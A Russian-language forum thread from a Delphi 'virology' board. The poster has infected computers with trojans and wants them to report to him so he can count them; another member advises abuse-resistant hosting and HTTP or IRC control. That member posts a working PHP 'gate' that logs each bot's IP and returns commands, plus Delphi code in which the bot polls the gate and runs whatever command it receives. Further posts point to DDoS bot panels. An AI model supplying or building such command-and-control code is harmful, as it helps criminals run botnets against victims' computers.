Четверг, 22.06.2017, 15:09 Приветствую вас Гость | Группа "Гости" 


[ Новые сообщения · Участники · Правила форума · Поиск · RSS ]
Страница 1 из 11
Модератор форума: Волк-1024, Anton93, xXxSh@dowxXx 
delfcode » Delphi » Вирусология Delphi » Ботнет - обратная связь.
Ботнет - обратная связь.
wmFestДата: Суббота, 04.06.2011, 08:58 | Сообщение # 1
Частый гость
Зарегистрирован: 02.05.2011
Группа: Пользователи
Сообщений: 34
Статус: Offline
Нужно вычислить численность заражённых компьютеров. Для этого я дам команду троянам скачать программку, которая 1 раз отошлёт мне что-нибудь. Таким образом каждый "зомби" отправит мне по 1 пакету, и я буду знать их численность.
Только сервер мой находится на сайте юкоз и обратной связи я никак не предусмотрел. И теперь не знаю, как трояны могут сообщить мне о себе. Как? может написать трояна, который будет отсылать мне что-то по почте? или может который будет 1 раз тыкать кнопочку на сайте(а сайт будет вести подсчёт)?
В общем как лучше организовать эту обратную связь..

если через почту, то я всё никак не могу отправить письмо через SMTP. а точнее не могу пройти авторизацию на mail.ru, если кто знает как, прошу помочь smile


Сообщение отредактировал dolphin - Суббота, 04.06.2011, 13:04
 
wmFestДата: Суббота, 04.06.2011, 10:33 | Сообщение # 2
Частый гость
Зарегистрирован: 02.05.2011
Группа: Пользователи
Сообщений: 34
Статус: Offline
ура! через почту получилось с помощью Доступно только для пользователей)

Доступно только для пользователей

наверно пусть так и будет.


Сообщение отредактировал dolphin - Суббота, 04.06.2011, 12:58
 
vvova15Дата: Суббота, 04.06.2011, 10:34 | Сообщение # 3
Участник
Зарегистрирован: 24.04.2010
Группа: Пользователи
Сообщений: 83
Статус: Offline
купи абузоустойчивый хостинг с поддержкой php и сделай управление через http .
напиши гейт, к которому боты будут посылать запрос через определенный промежуток времени и гейт уже будет записывать данные посланные ему посредством get или post запроса. в ответ(через response) можно отдавать команду ботам, которую они будут парсить и выполнять



ICQ 185-398
 
vvova15Дата: Суббота, 04.06.2011, 10:38 | Сообщение # 4
Участник
Зарегистрирован: 24.04.2010
Группа: Пользователи
Сообщений: 83
Статус: Offline
насчет smtp - это смешно даже. где ты возьмеш столько мыльников если у тебя к примеру будет ботнет из 500к машин? и даже если и найдеш, то они тебе всю почту зафлудят. для централизованного ботнета самое нормальное управление это через irc или http.


ICQ 185-398
 
wmFestДата: Суббота, 04.06.2011, 11:09 | Сообщение # 5
Частый гость
Зарегистрирован: 02.05.2011
Группа: Пользователи
Сообщений: 34
Статус: Offline
smtp - я же не собираюсь управлять через мыло ими biggrin мне только для подсчёта количества. а управляю я через web сайт.
пока решение в том, что я создал 1 мыло. и троян посылает письмо с ip зомби from мыло to это же самое мыло. 1 меня не радует - exe получился весом в 600кб, это смех dry
а насчёт абузоустойчивого хостинга с php согласен, так в ближайшем будущем и сделаю) но пока раскошелиться ни на что не могу. поэтому для самого начала и юкоз сгодится)


Сообщение отредактировал wmFest - Суббота, 04.06.2011, 11:09
 
vvova15Дата: Суббота, 04.06.2011, 17:50 | Сообщение # 6
Участник
Зарегистрирован: 24.04.2010
Группа: Пользователи
Сообщений: 83
Статус: Offline
Quote (wmFest)
а насчёт абузоустойчивого хостинга с php согласен, так в ближайшем будущем и сделаю) но пока раскошелиться ни на что не могу. поэтому для самого начала и юкоз сгодится)

Тогда лучше уж hut.ru Или holm.ru - там хоть php есть.
повесиш гейт и боты будут отсылать туда Ip:
gate.php зальеш а хост:
Code

<?
$f=fopen("log.txt","a+");
$s=$_SERVER["REMOTE_ADDR"]."\r\n";
fwrite($f,$s);
fclose($f);
echo "команда ботам";
?>

а в боте написать на событие таймера
Code

cmd:=idhttp1.get('http.//твой_сайт.hut2.ru/gate.php');//отправляем запрос на гейт
exec_cmd(cmd);//выполняем полученную команду(exec_cmd - образная функция, которая как бы выполняет команду, посланную боту)

так ты и ip-шники ботов запишеш в файл и команду заодно отдашь



ICQ 185-398
 
gravitasДата: Суббота, 04.06.2011, 19:02 | Сообщение # 7
Авторитетный
Зарегистрирован: 01.05.2010
Группа: Пользователи
Сообщений: 385
Статус: Offline
Посмотри админки ддос ботов: DeDaL, OunkBot, Optima, Гы-Bot.

TheDeduction

Для ускорения получения ответов на ваши вопросы рекомендуется подкармливание в виде +'ов в рейтинг :)
 
wmFestДата: Воскресенье, 05.06.2011, 11:09 | Сообщение # 8
Частый гость
Зарегистрирован: 02.05.2011
Группа: Пользователи
Сообщений: 34
Статус: Offline
vvova15, ок, так и сделаю, спасибо.
 
delfcode » Delphi » Вирусология Delphi » Ботнет - обратная связь.
Страница 1 из 11
Поиск:

delfcode.ru © 2008 - 2017 Хостинг от uCoz